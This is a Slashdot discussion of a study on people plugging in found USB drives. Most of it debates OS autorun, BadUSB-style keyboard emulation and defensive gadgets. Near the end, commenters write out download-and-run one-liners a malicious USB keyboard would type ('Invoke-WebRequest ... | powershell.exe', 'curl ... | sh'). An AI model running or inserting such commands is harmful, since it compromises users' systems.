A Lot of People Carelessly Plug In Random USB Drives Into Their Computers

An anonymous reader writes: Scientists have proven that a lot of people will carelessly plug in a USB drive found on the ground, exposing themselves to potential infections from malware. The researchers dropped 297 USB flash drives on a university campus and saw that in 48% of the cases, people picked them up, plugged them in, and opened files from the drive on their computers. Should such people be mocked? Would you plug in a USB drive that you found on the ground? Bruce Schneier, an American cryptographer, computer security and privacy specialist makes a good point: People get USB sticks all the time. The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good. The problem is that the OS trusts random USB sticks. The problem is that the OS will automatically run a program that can install malware from a USB stick. The problem is that it isn't safe to plug a USB stick into a computer.

I do the same thing with my penis

Never know what STDs are there, but YOLO

Re:I do the same thing with my penis

[Xenx]

As this is Slashdot, I imagine your hand has been monogamous. Risk of STDs should be low.

People are stupid

[JustAnotherOldGuy]

People are stupid, film at 11.

Re:People are stupid

[BronsCon]

You can buy USB drives in bulk for under a buck a piece, they don't need to be high-capacity, a 128MB drive can hold a shitload of malware. $5 might be a bit on the expensive side to infect a random machine that may not even be your target, but $75 to infect 100 machines is cheap for a targeted attack.

Re:People are stupid

[Dutch+Gun]

It might be a pretty effective way to go spearphishing though. If you're trying to get into a specific high-value network, then this might be a great way to do it. Drop it outside the target office, label it something like "Private photos - do not view!" or something like that, and watch human nature take over.

Hopefully the administrator has properly hardened workstations against executing code on a random USB, but I'd bet a surprising number of networks would get infected in fairly short order.

Re: People are stupid

[bugs2squash]

So buy the small drive and print 64GB on the outside.

Re:People are stupid

[green1]

Does your screwdriver jump up off your workbench and randomly start unscrewing things without asking first?

The problem isn't that you can run harmful code off a storage device, that's a know problem with an easy solution (don't be a moron). The problem is that the computer will AUTOMATICALLY run harmful code off a storage device by default unless you've done something to prevent it.

As long as a computer does what I ask it to, I can know what risks I'm taking, but if I can't even know if a USB stick is harmful until after it has done the harm, that's incredibly poor design.

Re:People are stupid

[JustAnotherOldGuy]

I don't expect a screwdriver to mistrust all screws until trust can be established, and only turn screws that it trusts.

If your screwdriver could unscrew stuff by itself without your permission, you probably shouldn't trust it.

-

Is a computer a tool, or is it the wonderful new mechanical brain that will soon replace the meat in my skull?

For some people, it's both.

Re:People are stupid

[JustAnotherOldGuy]

I too would plug in a random USB stick. Without knowing the situation of the device I plug it into why would you assume that I am stupid?

Because plugging in a USB stick that you found laying around in the parking lot or other random place would be a stupid thing to do.

Re:People are stupid

[AK+Marc]

You put 10 spread around the parking lot with the name/logo of the company, or a competitor (or try both and see which hits best), and someone will "be nice" and try to see whose it is to return it, or something like that. The real reason scams don't work as well as they should is that scammers prey on the weak (419 scams), rather than preying on the good people.

And the people here claim that nothing can be hardened against USB. It could look like a memory stick, but have a keylogger that loads as a HID (often allowed for all), and has a USB-powered 3G modem for calling home and sending the keystrokes. Just blocking USB-loaded software won't do any good when you run into an attacker smarter than you.

The chance of getting juicy selfies are a lot high

[viking80]

The chance of getting juicy selfies are a lot higher than getting infected.
Kind of like picking up an unknown person in a bar and having sex. Maybe even better odds or not getting infected. The study did not compare this.

Is this still true?

[cyber-vandal]

Does Windows still run things automatically from external media. I thought that had been changed in Win 7.

Re:Is this still true?

[gstoddart]

You pretty much need to disable it yourself, which means you need to know to do it.

Microsoft still treats auto-run like it's not a terrible idea.

It's actually kind of scary that anybody would keep doing that.

As far as I can see, Windows still excitedly runs anything it sees.

Re:Is this still true?

The larger threat isn't old school "autoplay.exe" style infections. The real fun is in storage media that compromises a host by mere virtue of popping up on the bus following insertion, with no visible userland code execution required. -PCP

Re:Is this still true?

First, malicious USB devices pretended to be CD readers because Windows would auto-run CDs but not mass storage (see U3, for supposedly non-malicious exploitation of this fact)

Then Windows started prompting the user before auto-run from CD drives also.

So now malicious USB devices present themselves as a keyboard and start typing commands (including hotkeys such as Win+R) to download and run malware off the net. USB keyboards can even interact with UAC prompts, even when presented on the Secure Desktop where software input emulation has no effect.

Re:Is this still true?

A security n00b I see. You assume that it'll detect as storage and automatically run some executable. It's not hard to make a USB stick recognize as a keyboard and then have it start running commands, including opening a web browser and downloading anything needed to compromise your system. Never forget what can be done with a simple keyboard.

Besides, Windows doesn't autorun anything, it pops up a dialog and asks the user what they want to do.

Re:Is this still true?

[sims+2]

it was changed in vista actually.

Back in winxp you could use something like ihound on your flashdrives to keep track of them.

http://www.cbsnews.com/news/re...

But then vista wouldn't do the auto run so AFAIK no one else has made a lojack for flash drives.

Re:Is this still true?

[Grishnakh]

This seems pretty easy to deal with. First off, a USB stick acting as a keyboard probably isn't going to get too far if it's plugged into a non-Windows computer, because all those hotkeys assume a Windows OS and probably won't work in a different environment.

But aside from that, the easy way to deal with this problem is to simply ask the user if they want to use the new keyboard they plugged in as a keyboard, or something to that effect (and only accept input from previously-known input devices until this one is explicitly authorized by the user).

Re:Is this still true?

[lgw]

Bit of a bootstrapping issue there. When you plug in your first mouse or keyboard, what would you use to click "yes"?

Re:Is this still true?

[nine-times]

How about any unrecognized keyboard pops up with a window that says in big-bright letters, "You've just plugged in a new keyboard. Please type the following randomly-generated code into your keyboard to verify that you want to use this keyboard." It may be a bit annoying, but it only happens the first time you plug in a keyboard. In order for a malicious fake-keyboard to be recognized, the user either needs to type in the code anyway (which requires a certain level of stupidity) or the fake-keyboard needs to somehow read the dialog box displayed on the screen.

There may be some other security hole here, but someone really clever could figure out a way to do it.

Re:Is this still true?

[lgw]

And if the keyboard is a barcode scanner? Or a mini gaming keyboard with only the keys near WASD?

Re:Is this still true?

[Calydor]

On the bright side, I am pretty sure they haven't made USB memory sticks yet that can read and parse the post-it on the monitor!

Re:Is this still true?

[flyingfsck]

Even nicer if you are doing R&D and use USB serial devices. Each time you plug a different one in, it gets a new device name. If have seen PCs with COM57: listed for the serial port.

Re:The chance of getting juicy selfies are a lot h

[Mr+D+from+63]

My guess is a fair amount of people open them just in an attempt to ID the owner so they can return it.

OS designers, not the customers are stupid.

[gurps_npc]

1) Given: People will take a random USB stick and plug it into a computer.

2) Conclusion: Only a moron will design an Operating system that automatically runs software on a USB stick. Any sane OS designer should declare all USB sticks to be suspect, and require an explicit confirmation before running any executable on it.

The minimal convenience of having auto-run for USB drives is far over-ridden by the huge security leak.

Design products for the people that will run it, not theoretical angels that will read and obey your instruction manuals - especially when they DO NOT COME WITH INSTRUCTION MANUALS anymore.

Re:OS designers, not the customers are stupid.

[cfalcon]

How do you distinguish betwixt an attack keyboard versus the user plugging in a real keyboard?

Re:OS designers, not the customers are stupid.

USB drives can be set to short circuit a motherboard.

Conclusion: Don't plug unknown USB drives into your computer.

Re:OS designers, not the customers are stupid.

[thegarbz]

2) Conclusion: Only a moron will design an Operating system that automatically runs software on a USB stick. Any sane OS designer should declare all USB sticks to be suspect, and require an explicit confirmation before running any executable on it.

The OS is not the problem. OSes haven't auto-executed content on USB sticks for a long time. The problem is the USB subsystem itself. A stick could enumerate as any number of devices, including a keyboard and mouse and take control of the computer as the current user with absolutely zero possibility for the OS to do anything about it.

A USB device has also shown to do actual damage to hardware without the OS even running or the computer even being turned on.

Stop trying to idiot proof things. That never works.

Mr. Robot

[show+me+altoids]

There is a scene in Mr. Robot where a girl dumps a bunch of infected USB stick in the parking lot of a police station, and a cop picks one up and plugs it into his computer. I thought this was rather far-fetched, but I guess not.

Re:Mr. Robot

Many of the attack-vectors displayed in Mr. Robot were so used because they have been successful in the real world.

Turn off autorun

[cmiller173]

I turned off autorun on any external media a long time ago, back when sony cd's were injecting rootkits under the guise of DRM circa 2005. Nothing on insertable media autoruns on my PC.

don't eat candy from the ground, either

[Thud457]

USB drives?!

How about blindly trusting USB chargers from Alibaba/ebay?!
Or assuming that new USB-C cable from Amazon won't set your house on fire?!!!

Re:don't eat candy from the ground, either

[MightyYar]

I've busted apart some of those Ali/Ebay/Banggood USB chargers out of sheer morbid curiosity. Those things are so cheaply constructed that it is a physical impossibility that they would successfully negotiate a USB data connection. Even the supposed "hubs" lack capacitors, or even crystals for the controllers. Many of them even save money and omit the diode meant to prevent wall-wart supply voltage from feeding back to the host computer. They are way too busy ripping you off the old-fashioned way to take on more sophisticated cyber crime.

On a side note, the 110v shock that you get in the US is bad enough. If I lived in a country with 220+ V on my wall-warts, I would never ever use one of those Chinese adapters. Terrifying. That crappy, abused little transformer is the only thing keeping the USB port from being energized - and that's assuming that the charger otherwise has decent isolation, which is a bad assumption. YouTube is full of cheap Chinese electronics breakdown porn.

Can't blame "people"; it's the industry's failing

This isn't just the OS; you can easily diddle USB devices with malware in their firmware that then diddles the host in ways that doesn't require an obviously too trusting OS such as the most popular one that continues in this manner well after the idea has been well and truly discredited.

In other words, "we", the people that design and make the hardware and the software and so on, keep on making promises we know are false to "users": "No training needed", "this OS is user friendly", "this hardware will do what you tell it to", and so on, and so forth. It's the industry that's at fault because all that "stupid stuff" the users do, we keep on telling them that it's quite right and go ahead... right up until we chastise them for having fallen for a scam or a virus or whatever. "Sure you can do that", 'but now the box is bleeping angrily', "don't do that then." Worst pavlov training ever.

So no, you really cannot blame "people" for this, nor "users". It's the engineers and perhaps moreso the companies employing the engineers.

Penetration Testing 101

[wjcofkc]

You quickly drive through the employee parking\entry area of a bank. You toss half a dozen, maybe less, infected USB drives out your window on the way. I've only ever heard of that testing method used on banks, by genuine, hired security firms, but I imagine it could go a lot further. Needless to say it generally results in "Yay! free USB drives! Let's plug em in!" Then something phones home.

People are simple like that. Every so often someone asks me what the best way to crack (misc.) password is. I tell them to ask for it.

Automatically good?

[capntao]

"a USB stick given away at a trade show is automatically good." the hell ever gave you that idea? a USB stick in original packaging could have malware all up ins for all you know.

USB authorization

[rastos1]

That's why we have USB authorization. Since 2007.

What kind of dumb OS...

[Pfhorrest]

What kind of dumb OS autoruns anything off of any volume the moment it's connected without any request from the user?

Oh right, Windows. Well, there's your problem.

Re:What kind of dumb OS...

It doesn't even have to involve autorun: https://www.blackhat.com/us-14/briefings.html#badusb-on-accessories-that-turn-evil

Once reprogrammed, benign devices can turn malicious in many ways, including:

        A device can emulate a keyboard and issue commands on behalf of the logged-in user, for example to exfiltrate files or install malware. Such malware, in turn, can infect the controller chips of other USB devices connected to the computer.
        The device can also spoof a network card and change the computer’s DNS setting to redirect traffic.
        A modified thumb drive or external hard disk can – when it detects that the computer is starting up – boot a small virus, which infects the computer’s operating system prior to boot.

Trust your own

[U2xhc2hkb3QgU3Vja3M]

As a Canadian, I cannot trust either China nor the USA about spyware and trojans. This means that unless the USB drive is made of wood and smells like maple syrup, I don't trust it.

Re:disable auto-run

[Tuidjy]

The problem is that the USB drive can identify as a different kind of device, like a keyboard, run commands, download and install software, and even interact with the security modal screens.

Old news, but somehow still relevant.

[Euphorinaut]

I have mixed feelings every time I see this. Every time I see one of these articles come across, there's a flood of comments about how its not news, and each time I see it I lean closer to the notion that this paradox of "non-news" that in and of itself is caused by a lack of awareness(which can only be remedied by news) might be dragging along by the dead weight of our habit to only share this knowledge with the tech crowd that already knows about it. This knowledge can only do so much unless it makes its way to those people who keep on asking me to reset their password because they forget that caps lock is on.

Re:People are stupid [Not]

[Tablizer]

No, the people are NOT stupid.

Logically a data drive should have data and only data from the computer's perspective, and not run any executables or scripts on it without first explicitly asking. It should be designed that way from the start. That's how Vulcans would design it.

The fact that it's so easy for hackers to bypass what SHOULD be normal and expected is a failure of the technology and/or standards, NOT of consumers.

Re:The chance of getting juicy selfies are a lot h

[sexconker]

Yeah right.

I'm not most people, but I did exactly this (with an SD card).

I went through photos on the card, managed to fine one that included a USPS package, transformed the image to read a partial name and was able to scan the barcode to get a zip, looked at other photos and compared them to Google/Bing maps and found the street but not the address, then found several profiles on the web, ultimately matching one photo to a Facebook account using a cropped version as the profile photo.

I then created a throwaway email account to create a throwaway Facebook account under the name of Natalie FoundUrSDCard or some such, messaged her and posted the uncropped version of her profile photo, and waited.

She responded and sent her uncle to come pick it up.

He did.

Sounds like a business opportunity

[davidwr]

First person to invent a cheap, provably secure, not-already-patent/intellectual-property-encumbered "USB condom" (really, a very small computer) that sits between my computer and a USB stick which disables boot, Windows-auto-run, device-driver shenanigans, and the like gets the win.

--
One of many possible ways to do this:
* Assume the device is a generic USB memory stick. If it's not, fail.
* If it is, attempt to access the files using generic methods. If it doesn't work, fail.
* If it's not a recognized filesystem (fat-variations, ntfs, ext2-variations, possibly others), fail.
* Present the directory-tree to the user's real computer a sub-tree so any files the host sees in the "root" directory as "special" aren't there.
* Present the "device" to the host as read-only.
* Consider simply not presenting well-known files like autorun.exe to the host computer at all.

The hard part will probably be that future USB sticks may not work with today's "USB condoms" as, by definition, the "condoms" would not trust any device-driver-like code that resides on the USB stick. This can be partially mitigated if the USB stick's device-driver-like code is signed and the signer's key is trusted by the "USB condom." But this is not without its own risks.

--
Bonus points if the "USB condom" it also stops hardware trojan horses like the "plug me in and 30 seconds later I'll fry your USB port" devices, even if it has to die in the process.

-------------
Note - I haven't done a Google search - such a thing may already exist. If it's cheap (under $10) and proven to provide protection without doing harm, I'm interested in buying a few.

Re:Quick question

[NotAPK]

My business idea is the "USB Condom". It's a USB inter-connect to go between your device and the host. It runs in two modes: - charging only. The device will negotiate power delivery and pass the current back to the device. Nothing else gets through. This is used to protect a device (such as a smart phone) from an unknown/untrusted host. - data only. The device can present as a USB mass storage device, but all other devices are blocked. This is used to protect a host from an unknown/untrusted device, like in this article. This would involve an embedded system that runs rather sophisticated code to inspect USB packets, or even present as a hub. I'm sure it could be miniaturized quite nicely. I have other things to do: does anyone want to make this?

Re:The chance of getting juicy selfies are a lot h

[thegarbz]

I think you have your statistics backwards. The number of people carrying around juicy selfies on a USB stick is considerably lower than the amount of USB sticks containing malware.

Mobile phone may be different.

USB keyboard. Your computer DOES run the commands

[raymorris]

You assume that USB stick is a flash memory device. Being nasty, it tells the computer that it's a keyboard. Your computer almost certainly processes keyboard commands just like other computers do. I've built one of these.

Re:USB keyboard. Your computer DOES run the comman

[nine-times]

That's clever, but the attack isn't going to be extremely simple to pull off. First, you have to know what kind of system you're plugged into-- what keyboard shortcuts will get you to a command line, what commands can be run at that command line. If the system is slower than you expect, if it takes too long to execute something, your input might not go where you expect it to. If the user is sitting in front of the computer at the time, there will be a limited span of time to execute what you want to, since the user can type something else, change which window is active, or do any number of things to interrupt your process.

I've had some experience in trying to make macros that would replay keyboard/mouse input in order to run certain applications and execute commands, and it's amazing the kinds of things that can throw it off, even when you're working on a known/controlled system. I bet it'd be possible to make one that, to give an example, if you knew exactly what OS you were using, it would launch the CLI and delete the current user's home folder. I wouldn't bet on getting reliable results doing anything much more complicated than that.

Re:USB keyboard. Your computer DOES run the comman

[Tablizer]

Being nasty, it tells the computer that it's a keyboard...

OS should prompt to verify. "A new peripheral has been detected. It claims to be a keyboard. Is this correct?"

True, if you don't have a keyboard (and no mouse yet) you cannot tell the computer if you approve or disapprove.

A partial solution would be to display a message and give the user 90 seconds to respond.

"A new device that claims to be a keyboard has been detected (plugged in). If you don't reply within 90 seconds, the keyboard will be accepted."

Re:USB keyboard. Your computer DOES run the comman

[phantomfive]

Another solution: if a keyboard is already plugged in, prompt for a warning. If a keyboard is not plugged in, accept it.

Re:Can't blame "people"; it's the industry's faili

[rahvin112]

You did see the malicious USB "drive" that was actually a transformer right (developed as an exhibit on how dangerous random USB can be)? It took about a second for it to build up 240V and send it back through the port. First pulse dropped the screen and probably everything else as well, the second pulse killed the whole laptop power system. And it all happened before you could even pull it. It also would keep pulsing until power to the port stopped.

Re:People are stupid [Not]

[JustAnotherOldGuy]

No, the people are NOT stupid.

Thousands upon thousands of years of history disagree.

WebRequest tinyurl.com/hfgrhd | powershell.exe

[raymorris]

Trying to do much through the GUI could be quite error-prone, though errors are acceptable. The more normal approach would be for the keyboard to run something like this single command for Windows, which tells the OS to download and run a script:

Win+R Invoke-WebRequest tinyurl.com/hfgrhd | powershell.exe

And / or this for Linux and Mac:
Ctrl-Alt+F1 curl http://tinyurl.com/hfhfh | sh
Ctrl-Alt+F7

Powershell or /bin/sh takes over from there - the victim could yank the trojan device out and the malicious script will continue to run in the background.

Basically how I did it (first for screen saver loc

[raymorris]

That's basically what I did; I used the same chip used by the Arduino Nano, flashed with the Arduino bootloader, without the Arduino circuit board.

At first, I put it together to brute-force an Android PIN overnight. Then I adjusted the code slightly to keep a Chromebox from going into power saving mode, because the Chromebox was running a wall-mounted display.

Having a tiny USB device that acts as a keyboard and nothing more to do with it, mounting it in an old flash drive casing was the next logical step for a security geek like myself.

It downloads and runs a program

[raymorris]

There are a few characters missing from the code I posted. I don't have a Windows machine handy to test with at the moment, in order to catch any errors. It would actually be more like:

Win+R powershell -command 'Invoke-WebRequest http...

Invoke-WebRequest downloads a URL, like a browser would, but then we use the pipe character | to send the content of that URL to powershell. Powershell is kind of like cmd.exe, but more powerful. If you do Win+R cmd.exe you'll see what looks like a DOS prompt, where you can type commands. Powershell is that on steroids (and on crack).

Piping them together, you get "retrieve commands from http://tinyurl.com/jfjdhd and run them using powershell ".

The Linux/Unix/Mac version is similar:

curl http://tinyurl.com/hacker | sh

Curl gets whatever is at that URL and sends it to "sh". Sh, the shell, is the "DOS prompt" of Unix, and runs whatever commands that curl got from the internet.

Re:It downloads and runs a program

[houghi]

At least use a real working URL:
curl http://houghi.org/trojan | sh

It is not a Trojan, I promise.

Re:The chance of getting juicy selfies are a lot h

[ImprovOmega]

That was some epically beautiful nerdiness right there.

Re: Can't blame "people"; it's the industry's fail

[phaserbanks]

https://www.grahamcluley.com/2...

The video is somewhat anti-climactic, but there ya go.

Re:USB keyboard. Your computer DOES run the comman

[flyingfsck]

On BSD at least, you can lock the install to a specific USB keyboard ID, so then it won't accept a random HID.